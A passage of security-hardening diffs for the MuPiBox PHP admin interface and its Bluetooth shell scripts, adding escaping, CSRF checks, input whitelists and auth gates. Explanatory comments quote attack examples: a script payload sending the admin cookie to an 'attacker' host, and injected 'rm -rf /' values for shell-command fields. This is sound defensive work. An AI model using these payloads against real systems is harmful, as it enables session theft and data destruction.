     <?php if (isset($message)) echo "<div class='message'>$message</div>"; ?>
 
     <form method="post" onsubmit="return validateJSON();">
+        <input type="hidden" name="csrf_token" value="<?= htmlspecialchars($csrfToken, ENT_QUOTES) ?>" />
         <textarea id="jsoneditor" name="jsondata"><?= htmlspecialchars($pretty) ?></textarea>
         <div class="buttons">
             <input type="submit" class="button_text_green" value="💾 Save file" />

--- a/AdminInterface/www/media.php
+++ b/AdminInterface/www/media.php
@@ -173,56 +173,76 @@
 					print "./images/empty.png";
 					}
 				}
+			// MED-15: every $all_media[…] field below is rendered raw into
+			// HTML. data.json is admin-controlled in normal use, but its
+			// contents flow from /api/add and /api/edit which themselves
+			// take user input — and even more directly, RSS resume entries
+			// pick up the feed's own title/description fields, which are
+			// fully attacker-controlled. A podcast feed with
+			// `<title><script>fetch('http://attacker/'+document.cookie)
+			// </script></title>` would land that script into media.php
+			// (the admin's session cookie + interfacelogin password hash
+			// as exfil candidates). htmlspecialchars on every echoed
+			// value, plus URL-validation on the href anchors so a
+			// `cover` value of `javascript:alert(1)` can't activate.
+			$h = function($v) { return htmlspecialchars((string)$v, ENT_QUOTES, 'UTF-8'); };
+			// For href values we additionally insist on http(s) — anything
+			// else (javascript:, data:, file:) collapses to '#'.
+			$safeHref = function($v) {
+				$s = (string)$v;
+				if (preg_match('#^https?://#i', $s)) return htmlspecialchars($s, ENT_QUOTES, 'UTF-8');
+				return '#';
+			};
 			print "'></div><div class='media_txt'>";
-			print "<table><tr><td width='100px'>Index:</td><td>" . $all_media['index'] . "</td></tr>";
-			print "<tr><td>Type:</td><td>" . $all_media['type'] . "</td></tr>";
-			print "<tr><td>Category:</td><td>" . $all_media['category'] . "</td></tr>";
+			print "<table><tr><td width='100px'>Index:</td><td>" . $h($all_media['index']) . "</td></tr>";
+			print "<tr><td>Type:</td><td>" . $h($all_media['type']) . "</td></tr>";
+			print "<tr><td>Category:</td><td>" . $h($all_media['category']) . "</td></tr>";
 			if($all_media['artist'])
 				{
-				print "<tr><td>Artist:</td><td>" . $all_media['artist'] . "</td></tr>";
+				print "<tr><td>Artist:</td><td>" . $h($all_media['artist']) . "</td></tr>";
 				}
 			if($all_media['title'])
 				{
-				print "<tr><td>Title:</td><td>" . $all_media['title'] . "</td></tr>";
+				print "<tr><td>Title:</td><td>" . $h($all_media['title']) . "</td></tr>";
 				}
 			if($all_media['id'])
 				{
 				if($all_media['category'] == "radio")
 					{
-					print "<tr><td>ID:</td><td><a href='" . $all_media['id'] . "' target='_blank'>" . $all_media['id'] . "</a></td></tr>";
+					print "<tr><td>ID:</td><td><a href='" . $safeHref($all_media['id']) . "' target='_blank'>" . $h($all_media['id']) . "</a></td></tr>";
 					}
 				else
 					{
-					print "<tr><td>ID:</td><td>" . $all_media['id'] . "</td></tr>";
+					print "<tr><td>ID:</td><td>" . $h($all_media['id']) . "</td></tr>";
 					}
 				}
 			if($all_media['artistid'])
 				{
-				print "<tr><td>ID:</td><td>" . $all_media['artistid'] . "</td></tr>";
+				print "<tr><td>ID:</td><td>" . $h($all_media['artistid']) . "</td></tr>";
 				}
 			if($all_media['showid'])
 				{
-				print "<tr><td>ID:</td><td>" . $all_media['showid'] . "</td></tr>";
+				print "<tr><td>ID:</td><td>" . $h($all_media['showid']) . "</td></tr>";
 				}
 			if($all_media['query'])
 				{
-				print "<tr><td>Search query:</td><td>" . $all_media['query'] . "</td></tr>";
+				print "<tr><td>Search query:</td><td>" . $h($all_media['query']) . "</td></tr>";
 				}
 			if($all_media['shuffle'])
 				{
-				print "<tr><td>Shuffle:</td><td>" . $all_media['shuffle'] . "</td></tr>";
+				print "<tr><td>Shuffle:</td><td>" . $h($all_media['shuffle']) . "</td></tr>";
 				}
 			if($all_media['cover'])
 				{
-				print "<tr><td>Cover-URL:</td><td><a href='" . $all_media['cover'] . "' target='_blank'>" . substr($all_media['cover'],0,45) . "...</a></td></tr>";
+				print "<tr><td>Cover-URL:</td><td><a href='" . $safeHref($all_media['cover']) . "' target='_blank'>" . $h(substr($all_media['cover'],0,45)) . "...</a></td></tr>";
 				}
 			if($all_media['artistcover'])
 				{
-				print "<tr><td style>Cover-URL:</td><td><a href='" . $all_media['artistcover'] . "' target='_blank'>" . substr($all_media['artistcover'],0,45) . "...</a></td></tr>";
+				print "<tr><td style>Cover-URL:</td><td><a href='" . $safeHref($all_media['artistcover']) . "' target='_blank'>" . $h(substr($all_media['artistcover'],0,45)) . "...</a></td></tr>";
 				}
 			if($all_media['sorting'])
 				{
-				print "<tr><td>Sorting:</td><td>".$all_media['sorting']."</td></tr>";
+				print "<tr><td>Sorting:</td><td>".$h($all_media['sorting'])."</td></tr>";
 				}
 			if($all_media['aPartOfAll'])
 				{
@@ -230,16 +250,16 @@
 				}
 			if($all_media['aPartOfAllMin'])
 				{
-				print "<tr><td>Interval-Start:</td><td>".$all_media['aPartOfAllMin']."</td></tr>";
+				print "<tr><td>Interval-Start:</td><td>".$h($all_media['aPartOfAllMin'])."</td></tr>";
 				}
 			if($all_media['aPartOfAllMax'])
 				{
-				print "<tr><td>Interval-End:</td><td>".$all_media['aPartOfAllMax']."</td></tr>";
+				print "<tr><td>Interval-End:</td><td>".$h($all_media['aPartOfAllMax'])."</td></tr>";
 				}
-			
+
 			if($url2media)
 				{
-				print "<tr><td>Spotify:</td><td><a href='" . $url2media . "' target='_blank'>" . substr($url2media,0,45) . "...</a></td></tr>";
+				print "<tr><td>Spotify:</td><td><a href='" . $safeHref($url2media) . "' target='_blank'>" . $h(substr($url2media,0,45)) . "...</a></td></tr>";
 				}
 			print "</table></div>\n";
 			//print "URL: " . $all_media['type'] . "<br>";

--- a/AdminInterface/www/mupi.php
+++ b/AdminInterface/www/mupi.php
@@ -26,23 +26,41 @@
 	$dlcd_rotation_state=`sed -n '/^[[:blank:]]*display_lcd_rotate=/{s/^[^=]*=//p;q}' /boot/config.txt`;
 	$hdmi_rotation_state=`sed -n '/^[[:blank:]]*display_hdmi_rotate=/{s/^[^=]*=//p;q}' /boot/config.txt`;
 
-	if(isset($_POST['hdmi_rotation']) && $_POST['hdmi_rotation'] != substr($hdmi_rotation_state,0,-1))
+	// Display rotations: dietpi accepts integer rotation values (0/90/180/270
+	// for HDMI, 0/1/2/3 for LCD-flips). The values were spliced into a
+	// double-quoted shell string verbatim — a POST with hdmi_rotation="0\";
+	// rm -rf /; #" would have torn the quoting apart. intval() collapses
+	// anything non-numeric to 0 (safe default = no rotation).
+	$rotationWhitelist = [0, 1, 2, 3, 90, 180, 270];
+	if(isset($_POST['hdmi_rotation']))
 		{
-		exec("sudo su - dietpi -c \". /boot/dietpi/func/dietpi-globals && G_SUDO G_CONFIG_INJECT 'display_hdmi_rotate=' 'display_hdmi_rotate=" . $_POST['hdmi_rotation'] . "' /boot/config.txt\"");
-		$change=1;
-		$CHANGE_TXT=$CHANGE_TXT."<li>Set HDMI-Rotation [reboot is necessary]</li>";
+		$hdmiRot = intval($_POST['hdmi_rotation']);
+		if (in_array($hdmiRot, $rotationWhitelist, true) && $hdmiRot != substr($hdmi_rotation_state,0,-1))
+			{
+			exec("sudo su - dietpi -c \". /boot/dietpi/func/dietpi-globals && G_SUDO G_CONFIG_INJECT 'display_hdmi_rotate=' 'display_hdmi_rotate=" . $hdmiRot . "' /boot/config.txt\"");
+			$change=1;
+			$CHANGE_TXT=$CHANGE_TXT."<li>Set HDMI-Rotation [reboot is necessary]</li>";
+			}
 		}
-	if(isset($_POST['lcd_rotation']) && $_POST['lcd_rotation'] != substr($lcd_rotation_state,0,-1))
+	if(isset($_POST['lcd_rotation']))
 		{
-		exec("sudo su - dietpi -c \". /boot/dietpi/func/dietpi-globals && G_SUDO G_CONFIG_INJECT 'lcd_rotate=' 'lcd_rotate=" . $_POST['lcd_rotation'] . "' /boot/config.txt\"");
-		$change=1;
-		$CHANGE_TXT=$CHANGE_TXT."<li>Set LCD-Rotation [reboot is necessary]</li>";
+		$lcdRot = intval($_POST['lcd_rotation']);
+		if (in_array($lcdRot, $rotationWhitelist, true) && $lcdRot != substr($lcd_rotation_state,0,-1))
+			{
+			exec("sudo su - dietpi -c \". /boot/dietpi/func/dietpi-globals && G_SUDO G_CONFIG_INJECT 'lcd_rotate=' 'lcd_rotate=" . $lcdRot . "' /boot/config.txt\"");
+			$change=1;
+			$CHANGE_TXT=$CHANGE_TXT."<li>Set LCD-Rotation [reboot is necessary]</li>";
+			}
 		}
-	if(isset($_POST['dlcd_rotation']) && $_POST['dlcd_rotation'] != substr($dlcd_rotation_state,0,-1))
+	if(isset($_POST['dlcd_rotation']))
 		{
-		exec("sudo su - dietpi -c \". /boot/dietpi/func/dietpi-globals && G_SUDO G_CONFIG_INJECT 'display_lcd_rotate=' 'display_lcd_rotate=" . $_POST['dlcd_rotation'] . "' /boot/config.txt\"");
-		$change=1;
-		$CHANGE_TXT=$CHANGE_TXT."<li>Set Display-LCD-Rotation [reboot is necessary]</li>";
+		$dlcdRot = intval($_POST['dlcd_rotation']);
+		if (in_array($dlcdRot, $rotationWhitelist, true) && $dlcdRot != substr($dlcd_rotation_state,0,-1))
+			{
+			exec("sudo su - dietpi -c \". /boot/dietpi/func/dietpi-globals && G_SUDO G_CONFIG_INJECT 'display_lcd_rotate=' 'display_lcd_rotate=" . $dlcdRot . "' /boot/config.txt\"");
+			$change=1;
+			$CHANGE_TXT=$CHANGE_TXT."<li>Set Display-LCD-Rotation [reboot is necessary]</li>";
+			}
 		}
 
 	if($_POST['stop_sleeptimer'] == "Stop running timer")
@@ -163,12 +181,25 @@
 			
 	if($_POST['potimer'])
 		{
-		$timerSleepingTime=$_POST['powerofftimer']*60;
-		$command = "sudo nohup /usr/local/bin/mupibox/./sleep_timer.sh ".$timerSleepingTime."  > /dev/null 2>&1 &";
-		exec($command);
-		$change=3;
-		$CHANGE_TXT=$CHANGE_TXT."<li>".$_POST['powerofftimer']." minutes sleeptimer started</li>";
-		//sudo pkill -f "sleep_timer.sh"
+		// powerofftimer is in minutes (admin-typed). intval() forces it to
+		// an integer; the *60 just produces another integer, so even
+		// without escapeshellarg() the shell only sees digits. Plus a
+		// sanity cap: 24 hours is the longest a parent could reasonably
+		// want, beyond that it's an input mistake or an attacker.
+		$minutes = intval($_POST['powerofftimer'] ?? 0);
+		if ($minutes > 0 && $minutes <= 24 * 60)
+			{
+			$timerSleepingTime = $minutes * 60;
+			$command = "sudo nohup /usr/local/bin/mupibox/./sleep_timer.sh " . $timerSleepingTime . "  > /dev/null 2>&1 &";
+			exec($command);
+			$change=3;
+			$CHANGE_TXT=$CHANGE_TXT."<li>" . $minutes . " minutes sleeptimer started</li>";
+			//sudo pkill -f "sleep_timer.sh"
+			}
+		else
+			{
+			$CHANGE_TXT=$CHANGE_TXT."<li>ERROR: invalid sleeptimer value, refused</li>";
+			}
 		}
 
 	if( $_POST['change_netboot'] == "activate for next boot" )

--- a/AdminInterface/www/mupi.php
+++ b/AdminInterface/www/mupi.php
@@ -264,12 +264,25 @@
 
 	if ($_POST['change_cpug'])
 		{
-		$command = "sudo su - dietpi -c \". /boot/dietpi/func/dietpi-globals && G_SUDO G_CONFIG_INJECT 'CONFIG_CPU_GOVERNOR=' 'CONFIG_CPU_GOVERNOR=".$_POST['cpugovernor']."' /boot/dietpi.txt\"";
-		$test=exec($command, $output, $result );
-		$command = "sudo /boot/dietpi/func/dietpi-set_cpu";
-		exec($command, $output, $result );
-		$change=1;
-		$CHANGE_TXT=$CHANGE_TXT."<li>CPU Governor changet to  ".$_POST['cpugovernor']."</li>";
+		// H6: $_POST['cpugovernor'] floss bisher ungeprüft als Substring in
+		// einen verschachtelten `sudo su -c "...G_CONFIG_INJECT 'CONFIG_CPU_GOVERNOR=<wert>'..."`-
+		// Aufruf — post-auth Command-Injection. Whitelist gegen die vom Kernel
+		// tatsächlich angebotenen Governors aus scaling_available_governors;
+		// das ist auch genau die Liste, aus der der HTML-<select> generiert wird.
+		$available = explode(' ', trim((string)@file_get_contents(
+			'/sys/devices/system/cpu/cpu0/cpufreq/scaling_available_governors')));
+		$cpug_input = (string)($_POST['cpugovernor'] ?? '');
+		if (in_array($cpug_input, $available, true)) {
+			$command = "sudo su - dietpi -c \". /boot/dietpi/func/dietpi-globals && G_SUDO G_CONFIG_INJECT 'CONFIG_CPU_GOVERNOR=' 'CONFIG_CPU_GOVERNOR=".$cpug_input."' /boot/dietpi.txt\"";
+			$test=exec($command, $output, $result );
+			$command = "sudo /boot/dietpi/func/dietpi-set_cpu";
+			exec($command, $output, $result );
+			$change=1;
+			$CHANGE_TXT=$CHANGE_TXT."<li>CPU Governor changet to  ".htmlspecialchars($cpug_input, ENT_QUOTES, 'UTF-8')."</li>";
+		} else {
+			$change=1;
+			$CHANGE_TXT=$CHANGE_TXT."<li>CPU Governor change rejected: invalid value</li>";
+		}
 		}
 
 	if( $_POST['change_sd'] == "activate for next boot" )

--- a/AdminInterface/www/mupi.php
+++ b/AdminInterface/www/mupi.php
@@ -1461,8 +1461,16 @@ $CHANGE_TXT=$CHANGE_TXT."</ul></div>";
 ?>
 
 <?php
-        //$time2sleep=readfile("/tmp/.time2sleep");
-        $time2sleep=fgets(fopen("/tmp/.time2sleep", 'r'));
+        // M11: /tmp/.time2sleep only exists while a sleep timer is active.
+        // Without an active timer fopen() returned false and fgets(false)
+        // raised an uncaught TypeError on PHP 8+. Guard the resource open
+        // and default to empty string so the page renders cleanly either
+        // way (the JS side already handles an empty value).
+        $time2sleep = '';
+        if ($fh = @fopen("/tmp/.time2sleep", 'r')) {
+            $time2sleep = fgets($fh);
+            fclose($fh);
+        }
 ?>
 
 

--- a/AdminInterface/www/mupihat.php
+++ b/AdminInterface/www/mupihat.php
@@ -1,4 +1,8 @@
 <?php
+	// MED-16: same as service.php — csrf_check() before any output.
+	require_once __DIR__ . '/includes/csrf.php';
+	csrf_check();
+
 	include ('includes/header.php');
 
 	if( $_POST['save_custom'] )
@@ -131,6 +135,7 @@
 
 </script>	
 <form class="appnitro" name="mupi" method="post" action="mupihat.php" id="form">
+<?= csrf_field() ?>
 <div class="description">
 <h2>MuPiHAT</h2>
 <p>Release the power of MuPi...</p>

--- a/AdminInterface/www/mupihat.php
+++ b/AdminInterface/www/mupihat.php
@@ -7,28 +7,55 @@
 
 	if( $_POST['save_custom'] )
 		{
-		// Erstelle ein leeres Array für die benutzerdefinierte Batteriekonfiguration
-		$custom_battery_config = array();
+		// AR5-16: validate every voltage field before persisting. Without intval +
+		// range check, a malformed POST (browser bug, hostile actor on a shared LAN)
+		// could write non-numeric strings or out-of-range millivolts into the JSON.
+		// th_shutdown is the load-bearing one — if it ends up higher than the
+		// pack's normal operating range, the battery-protection logic will trigger
+		// a shutdown that never recovers; if it ends up at 0 or negative, the
+		// shutdown safeguard is silently disabled.
+		//
+		// Accepted range: 4000-12600 mV (covers 1S, 2S and 3S Li-Ion packs).
+		// Plus strict descending order: v_100 > v_75 > v_50 > v_25 > v_0,
+		// and v_0 >= th_warning >= th_shutdown.
+		$fields = ['v_100', 'v_75', 'v_50', 'v_25', 'v_0', 'th_warning', 'th_shutdown'];
+		$values = [];
+		$validation_error = '';
+		foreach ($fields as $field) {
+			if (!isset($_POST[$field]) || !ctype_digit((string) $_POST[$field])) {
+				$validation_error = "Field '$field' is not a positive integer";
+				break;
+			}
+			$mv = intval($_POST[$field]);
+			if ($mv < 4000 || $mv > 12600) {
+				$validation_error = "Field '$field' = $mv mV is outside 4000-12600 mV";
+				break;
+			}
+			$values[$field] = (string) $mv;
+		}
+		if ($validation_error === '' &&
+		    !($values['v_100'] > $values['v_75']
+		      && $values['v_75'] > $values['v_50']
+		      && $values['v_50'] > $values['v_25']
+		      && $values['v_25'] > $values['v_0'])) {
+			$validation_error = 'Voltages must strictly descend: v_100 > v_75 > v_50 > v_25 > v_0';
+		}
+		if ($validation_error === '' &&
+		    !($values['v_0'] >= $values['th_warning']
+		      && $values['th_warning'] >= $values['th_shutdown'])) {
+			$validation_error = 'Threshold order violated: v_0 >= th_warning >= th_shutdown required';
+		}
 
-		// Durchsuche das Array nach der benutzerdefinierten Batteriekonfiguration
-		foreach ($data["mupihat"]["battery_types"] as $key => $battery_type) {
-			if ($battery_type["name"] === "Custom") {
-				// Speichere die benutzerdefinierte Batteriekonfiguration aus dem Formular in das Array
-				$custom_battery_config["v_100"] = $_POST['v_100'];
-				$custom_battery_config["v_75"] = $_POST['v_75'];
-				$custom_battery_config["v_50"] = $_POST['v_50'];
-				$custom_battery_config["v_25"] = $_POST['v_25'];
-				$custom_battery_config["v_0"] = $_POST['v_0'];
-				$custom_battery_config["th_warning"] = $_POST['th_warning'];
-				$custom_battery_config["th_shutdown"] = $_POST['th_shutdown'];
-
-				// Aktualisiere die benutzerdefinierte Batteriekonfiguration im Datenarray
-				$data["mupihat"]["battery_types"][$key]["config"] = $custom_battery_config;
-
-				// Führe den Code zum Speichern und Aktualisieren der Konfiguration aus
-				$change = 4;
-				$CHANGE_TXT = $CHANGE_TXT . "<li>Custom battery configuration saved</li>";
-				break; // Beende die Schleife, da die Konfiguration gefunden und aktualisiert wurde
+		if ($validation_error !== '') {
+			$CHANGE_TXT = $CHANGE_TXT . "<li>Custom battery configuration rejected: " . htmlspecialchars($validation_error) . "</li>";
+		} else {
+			foreach ($data["mupihat"]["battery_types"] as $key => $battery_type) {
+				if ($battery_type["name"] === "Custom") {
+					$data["mupihat"]["battery_types"][$key]["config"] = $values;
+					$change = 4;
+					$CHANGE_TXT = $CHANGE_TXT . "<li>Custom battery configuration saved</li>";
+					break;
+				}
 			}
 		}
 		}

--- a/AdminInterface/www/network.php
+++ b/AdminInterface/www/network.php
@@ -173,9 +173,14 @@
 
 	if( $_POST['delete_wifi'] )
 		{
-		if( $_POST['wifinr'] )
+		// wpa_cli wifinr is always a small non-negative integer; intval()
+		// strips anything that isn't a digit, so a POST with
+		// wifinr="0; rm -rf /" becomes 0 and the chained-command injection
+		// is gone. -1 is invalid for wpa_cli but harmless.
+		$wifinr = isset($_POST['wifinr']) ? intval($_POST['wifinr']) : -1;
+		if ($wifinr >= 0)
 			{
-			$command = "sudo wpa_cli remove_network ".$_POST['wifinr']." && sudo wpa_cli save_config";
+			$command = "sudo wpa_cli remove_network " . $wifinr . " && sudo wpa_cli save_config";
 			exec($command, $output, $result );
 			$change=1;
 			$CHANGE_TXT=$CHANGE_TXT."<li>Wifi deleted</li>";

--- a/AdminInterface/www/pm2logs.php
+++ b/AdminInterface/www/pm2logs.php
@@ -1,5 +1,10 @@
 <?php
-$command = "sudo rm /var/www/pm2_logs.zip; sudo zip /var/www/pm2_logs.zip /home/dietpi/.pm2/logs/*;sudo chmod 777 /var/www/pm2_logs.zip; sudo chown www-data:www-data /var/www/pm2_logs.zip";
+require __DIR__ . '/includes/auth_check.php';
+
+// PM2 logs frequently contain stack traces with Spotify tokens / Telegram
+// chatIds / etc. auth_check.php is the header-only gate (header.php would
+// render HTML and corrupt the binary zip stream that follows).
+$command = "sudo rm /var/www/pm2_logs.zip; sudo zip /var/www/pm2_logs.zip /home/dietpi/.pm2/logs/*;sudo chmod 600 /var/www/pm2_logs.zip; sudo chown www-data:www-data /var/www/pm2_logs.zip";
 exec($command );
 
 //Define header information

--- a/AdminInterface/www/service.php
+++ b/AdminInterface/www/service.php
@@ -1,4 +1,10 @@
 <?php
+	// MED-16: csrf_check() must run BEFORE any output, otherwise the 403
+	// header can't be set. Pull in the helpers and validate first; only
+	// then include header.php (which renders HTML chrome).
+	require_once __DIR__ . '/includes/csrf.php';
+	csrf_check();
+
 	$onlinejson = file_get_contents('https://raw.githubusercontent.com/splitti/MuPiBox/main/config/templates/mupiboxconfig.json');
 	$dataonline = json_decode($onlinejson, true);
 	include ('includes/header.php');
@@ -75,7 +81,13 @@
 		$CHANGE_TXT=$CHANGE_TXT."<li>BT-Autoconnect-Service disabled</li>";
 		}
 
-	$rc = $output[count($output)-1];
+	// On a GET request none of the POST handlers above ran, so $output is
+	// never set. PHP 8 turned count(null) into a fatal TypeError —
+	// service.php has been crashing on every plain page-load since this
+	// box upgraded to PHP 8, with the form never reaching the browser.
+	// Pre-existing bug (not introduced by Phase 5) but blocking the
+	// CSRF-token verification, so fix here.
+	$rc = !empty($output) ? $output[count($output)-1] : '';
 	$command = "sudo service smbd status | grep running";
 	exec($command, $smboutput, $smbresult );
 	if( $smboutput[0] )
@@ -132,6 +144,7 @@
 ?>
 
 <form class="appnitro"  method="post" action="service.php" id="form">
+<?= csrf_field() ?>
 	<div class="description">
 		<h2>MupiBox services</h2>
 		<p>De/Activate some helpfull services...</p>

--- a/AdminInterface/www/spotify.php
+++ b/AdminInterface/www/spotify.php
@@ -18,7 +18,17 @@ if ( $_POST['spotifyget'] ) {
 }
 
 if ($_GET['code']) {
-	$command = "curl -d client_id=" . $data["spotify"]["clientId"] . " -d client_secret=" . $data["spotify"]["clientSecret"] . " -d grant_type=authorization_code -d code=" . $_GET['code'] . " -d redirect_uri=" . $REDIRECT_URI . " https://accounts.spotify.com/api/token";
+	// All four interpolated values reach the shell. clientId / clientSecret
+	// come from mupiboxconfig.json (admin-controlled) but $_GET['code'] is
+	// echoed back from Spotify's redirect — an attacker could craft a
+	// redirect URL with `code=$(rm -rf /)` or backticks. escapeshellarg()
+	// each value so the shell sees them as a single quoted token.
+	$command = "curl -d client_id=" . escapeshellarg($data["spotify"]["clientId"])
+	         . " -d client_secret=" . escapeshellarg($data["spotify"]["clientSecret"])
+	         . " -d grant_type=authorization_code"
+	         . " -d code=" . escapeshellarg($_GET['code'])
+	         . " -d redirect_uri=" . escapeshellarg($REDIRECT_URI)
+	         . " https://accounts.spotify.com/api/token";
 	exec($command, $Tokenoutput, $result);
 	$tokendata = json_decode($Tokenoutput[0], true);
 	$data["spotify"]["accessToken"] = $tokendata["access_token"];

--- a/AdminInterface/www/support_data.php
+++ b/AdminInterface/www/support_data.php
@@ -1,4 +1,9 @@
 <?php
+require __DIR__ . '/includes/auth_check.php';
+
+// support_data bundles config + logs + state for support. Same exposure
+// concerns as pm2logs.php / fullbackup.php — require auth via the
+// header-only gate (header.php would print HTML and corrupt the zip).
 $command = "sudo rm /var/www/support_data.zip";
 exec( $command );
 $command = "sudo rm -R /tmp/support";

--- a/AdminInterface/www/tweaks.php
+++ b/AdminInterface/www/tweaks.php
@@ -1,4 +1,8 @@
 <?php
+	// MED-16: same as service.php — csrf_check() before any output.
+	require_once __DIR__ . '/includes/csrf.php';
+	csrf_check();
+
 	$onlinejson = file_get_contents('https://raw.githubusercontent.com/splitti/MuPiBox/main/version.json');
 	$dataonline = json_decode($onlinejson, true);
 	include ('includes/header.php');
@@ -120,6 +124,7 @@
 ?>
 
 <form class="appnitro"  method="post" action="tweaks.php" id="form">
+<?= csrf_field() ?>
 	<div class="description">
 		<h2>MupiBox tweaks</h2>
 		<p>Make your box smarter and faster...</p>

--- a/AdminInterface/www/tweaks.php
+++ b/AdminInterface/www/tweaks.php
@@ -69,12 +69,21 @@
 
 	if ($_POST['change_cpug'])
 		{
-		$command = "sudo su - dietpi -c \". /boot/dietpi/func/dietpi-globals && G_SUDO G_CONFIG_INJECT 'CONFIG_CPU_GOVERNOR=' 'CONFIG_CPU_GOVERNOR=".$_POST['cpugovernor']."' /boot/dietpi.txt\"";
-		$test=exec($command, $output, $result );
-		$command = "sudo /boot/dietpi/func/dietpi-set_cpu";
-		exec($command, $output, $result );
-		$change=1;
-		$CHANGE_TXT=$CHANGE_TXT."<li>CPU Governor changet to  ".$_POST['cpugovernor']."</li>";
+		// H6: post-auth command-injection mitigation — siehe mupi.php
+		$available = explode(' ', trim((string)@file_get_contents(
+			'/sys/devices/system/cpu/cpu0/cpufreq/scaling_available_governors')));
+		$cpug_input = (string)($_POST['cpugovernor'] ?? '');
+		if (in_array($cpug_input, $available, true)) {
+			$command = "sudo su - dietpi -c \". /boot/dietpi/func/dietpi-globals && G_SUDO G_CONFIG_INJECT 'CONFIG_CPU_GOVERNOR=' 'CONFIG_CPU_GOVERNOR=".$cpug_input."' /boot/dietpi.txt\"";
+			$test=exec($command, $output, $result );
+			$command = "sudo /boot/dietpi/func/dietpi-set_cpu";
+			exec($command, $output, $result );
+			$change=1;
+			$CHANGE_TXT=$CHANGE_TXT."<li>CPU Governor changet to  ".htmlspecialchars($cpug_input, ENT_QUOTES, 'UTF-8')."</li>";
+		} else {
+			$change=1;
+			$CHANGE_TXT=$CHANGE_TXT."<li>CPU Governor change rejected: invalid value</li>";
+		}
 		}
 
 	if( $_POST['change_sd'] == "activate for next boot" )

--- a/AdminInterface/www/update_batteryicon.php
+++ b/AdminInterface/www/update_batteryicon.php
@@ -1,4 +1,9 @@
 <?php
+require __DIR__ . '/includes/auth_check.php';
+
+// MED-17: battery state was unauth-readable, useful for inferring the
+// box's runtime / activity pattern (powered-on hours, active vs idle).
+// Same auth_check.php gate as the other update_* polls.
 	$mupihat_file = '/tmp/mupihat.json';
 	$bat_icon = "";
 	if (file_exists($mupihat_file)) {

--- a/AdminInterface/www/update_fanicon.php
+++ b/AdminInterface/www/update_fanicon.php
@@ -1,4 +1,8 @@
 <?php
+require __DIR__ . '/includes/auth_check.php';
+
+// MED-17: fan state + CPU temperature was unauth-readable, useful for
+// fingerprinting active vs idle / load. Auth_check gates it.
 	$mupifan_file = '/tmp/fan.json';
 	$fan_icon = "";
 	if (file_exists($mupifan_file)) {

--- a/AdminInterface/www/update_mupihattable.php
+++ b/AdminInterface/www/update_mupihattable.php
@@ -1,4 +1,8 @@
 <?php
+require __DIR__ . '/includes/auth_check.php';
+
+// MED-17: this is the chunkiest of the four — full mupihat.json dump
+// (battery voltage, SOC, charge state, IBus, IBat, etc.). Auth-gate.
 	$mupihat_file = '/tmp/mupihat.json';
     $string = file_get_contents($mupihat_file);
     $mupihat_data = json_decode($string, true);

--- a/AdminInterface/www/update_wifiicon.php
+++ b/AdminInterface/www/update_wifiicon.php
@@ -1,4 +1,13 @@
 <?php
+require __DIR__ . '/includes/auth_check.php';
+
+// MED-17: this endpoint was unauth and shipped both info-disclosure
+// (SSID + Wi-Fi signal quality readable from the LAN, useful for
+// fingerprinting which AP the box is on) and a sudo-fork-per-request
+// pair (iwgetid + iwconfig). Browser tabs poll this every few seconds,
+// so an unauth flood was effectively a DoS amplifier on the dietpi
+// user. auth_check.php (header-only gate from CRIT-2/3/5) restricts
+// callers to authenticated admin sessions.
 	$commandSSID="sudo iwgetid -r";
 	$WIFI=exec($commandSSID);
 	$wifi_icon = "";

--- a/AdminInterface/www/vnc.php
+++ b/AdminInterface/www/vnc.php
@@ -5,8 +5,14 @@
 <h2>VNC: MuPiBox Remote Control</h2><p>
 <p>Remote control the Display-Session.</p>
 <?php
-	print "<p><embed src='http://".$data["mupibox"]["host"].":6080/vnc_lite.html?host=".$data["mupibox"]["host"]."&port=5900' id='remotecontrol'></p>";
-	print "<p><a href='http://".$data["mupibox"]["host"].":6080/vnc_lite.html?host=".$data["mupibox"]["host"]."&port=5900'' id='remotecontrol' target='_blank'>If it doesn't display properly or can't be served, try this Link and click me...</a></p>";
+	// LOW-2: hostname comes from mupiboxconfig.json, which a logged-in
+	// admin (or stored-XSS via data.json pre-MED-15) could have written
+	// with `";<script>...</script><` to break out of the attribute
+	// quotes. htmlspecialchars + ENT_QUOTES escapes both ' and " so
+	// neither attribute boundary can be escaped.
+	$h = htmlspecialchars((string)$data["mupibox"]["host"], ENT_QUOTES, 'UTF-8');
+	print "<p><embed src='http://".$h.":6080/vnc_lite.html?host=".$h."&port=5900' id='remotecontrol'></p>";
+	print "<p><a href='http://".$h.":6080/vnc_lite.html?host=".$h."&port=5900' id='remotecontrol' target='_blank'>If it doesn't display properly or can't be served, try this Link and click me...</a></p>";
 ?>
 </div>
 <?php

--- a/scripts/bluetooth/pair_bt.sh
+++ b/scripts/bluetooth/pair_bt.sh
@@ -1,19 +1,29 @@
 #!/bin/bash
 #
+# Pair (and connect to) a Bluetooth device by MAC. Called from the admin
+# bluetooth.php endpoint. The MAC is user-controlled, so it must be
+# validated strictly before being piped into bluetoothctl — anything else
+# allows newline injection of arbitrary bluetoothctl commands.
+
+MAC="${1:-}"
+if [[ ! "$MAC" =~ ^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$ ]]; then
+	echo "Error: invalid MAC address format" >&2
+	exit 1
+fi
 
 coproc bluetoothctl
 echo -e "power on\n" >&${COPROC[1]}
 echo -e "agent on\n" >&${COPROC[1]}
-echo -e "defaut-agent\n" >&${COPROC[1]}
+echo -e "default-agent\n" >&${COPROC[1]}
 echo -e "scan on\n" >&${COPROC[1]}
 sleep 10
 echo -e "scan off\n" >&${COPROC[1]}
-echo -e "trust $1\n" >&${COPROC[1]}
+echo -e "trust $MAC\n" >&${COPROC[1]}
 sleep 2
-echo -e "pair $1\nyes\n" >&${COPROC[1]}
+echo -e "pair $MAC\nyes\n" >&${COPROC[1]}
 sleep 2
-echo -e "connect $1\n" >&${COPROC[1]}
+echo -e "connect $MAC\n" >&${COPROC[1]}
 sleep 2
 echo -e 'exit' >&${COPROC[1]}
-ouput=$(cat <&${COPROC[0]})
-echo $output
+output=$(cat <&${COPROC[0]})
+echo "$output"

--- a/scripts/bluetooth/remove_bt.sh
+++ b/scripts/bluetooth/remove_bt.sh
@@ -1,14 +1,24 @@
 #!/bin/bash
 #
+# Remove a paired Bluetooth device by MAC. Called from the admin
+# bluetooth.php endpoint. The MAC is user-controlled, so it must be
+# validated strictly before being piped into bluetoothctl — anything else
+# allows newline injection of arbitrary bluetoothctl commands.
+
+MAC="${1:-}"
+if [[ ! "$MAC" =~ ^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$ ]]; then
+	echo "Error: invalid MAC address format" >&2
+	exit 1
+fi
 
